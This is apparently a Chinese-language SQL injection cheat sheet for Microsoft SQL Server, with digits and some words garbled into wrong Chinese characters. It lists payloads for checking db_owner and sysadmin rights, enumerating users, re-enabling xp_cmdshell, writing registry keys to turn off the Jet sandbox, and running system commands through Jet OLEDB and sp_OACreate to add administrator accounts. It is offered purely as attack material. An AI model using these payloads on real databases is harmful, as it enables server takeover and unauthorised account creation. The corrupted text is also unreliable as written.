//看看是甚么权限的
and  一=(Select IS_MEMBER( 三 九;db_owner 三 九;))
And char( 一 二 四)% 二BCast(IS_MEMBER( 三 九;db_owner 三 九;) as varchar( 一))% 二Bchar( 一 二 四)= 一 ;--

//检测是可有读与某数据库的权限
and  一= (Select HAS_DBACCESS( 三 九;master 三 九;))
And char( 一 二 四)% 二BCast(HAS_DBACCESS( 三 九;master 三 九;) as varchar( 一))% 二Bchar( 一 二 四)= 一 --


数字类型
and char( 一 二 四)% 二Buser% 二Bchar( 一 二 四)=0

字符类型
 三 九; and char( 一 二 四)% 二Buser% 二Bchar( 一 二 四)=0 and  三 九; 三 九;= 三 九;

搜刮 类型
 三 九; and char( 一 二 四)% 二Buser% 二Bchar( 一 二 四)=0 and  三 九;% 三 九;= 三 九;

爆用户名
and user>0
 三 九; and user>0 and  三 九; 三 九;= 三 九;

检测是可为SA权限
and  一=(select IS_SRVROLEMEMBER( 三 九;sysadmin 三 九;));--
And char( 一 二 四)% 二BCast(IS_SRVROLEMEMBER(0x 七 三00 七 九00 七 三00 六 一00 六 四00 六D00 六 九00 六E00) as varchar( 一))% 二Bchar( 一 二 四)= 一 --

检测是否是MSSQL数据库
and exists (select * from sysobjects);--

检测是可支撑 多止
;declare @d int;--

规复xp_cmdshell
;exec master..dbo.sp_addextendedproc  三 九;xp_cmdshell 三 九;, 三 九;xplog 七0.dll 三 九;;--


select * from openrowset( 三 九;sqloledb 三 九;, 三 九;server= 一 九 二. 一 六 八. 一. 二00, 一 四 三 三;uid=test;pwd=pafpaf 三 九;, 三 九;select @@version 三 九;)

//-----------------------
// 执止敕令
//-----------------------
起首 谢封沙盘模式：
exec master..xp_regwrite  三 九;HKEY_LOCAL_MACHINE 三 九;, 三 九;SOFTWARE\Microsoft\Jet\ 四.0\Engines 三 九;, 三 九;SandBoxMode 三 九;, 三 九;REG_DWORD 三 九;, 一

然后应用 jet.oledb执止体系 敕令
select * from openrowset( 三 九;microsoft.jet.oledb. 四.0 三 九;, 三 九;;database=c:\winnt\system 三 二\ias\ias.mdb 三 九;, 三 九;select shell("cmd.exe /c net user admin admin 一 二 三 四 /add") 三 九;)

执止敕令
;DECLARE @shell INT EXEC SP_OAcreate  三 九;wscript.shell 三 九;,@shell OUTPUT EXEC SP_OAMETHOD @shell, 三 九;run 三 九;,null,  三 九;C:\WINNT\system 三 二\cmd.exe /c net user paf pafpaf /add 三 九;;--

EXEC [master].[dbo].[xp_cmdshell]  三 九;cmd /c md c:\ 一 一 一 一 三 九;

断定 xp_cmdshell扩大 存储进程 是可存留：
http:// 一 九 二. 一 六 八. 一. 五/display.asp必修keyno= 一 八 八 and  一=(Select count(*) FROM master.dbo.sysobjects Where xtype =  三 九;X 三 九; AND name =  三 九;xp_cmdshell 三 九;)

写注册表
exec master..xp_regwrite  三 九;HKEY_LOCAL_MACHINE 三 九;, 三 九;SOFTWARE\Microsoft\Jet\ 四.0\Engines 三 九;, 三 九;SandBoxMode 三 九;, 三 九;REG_DWORD 三 九;, 一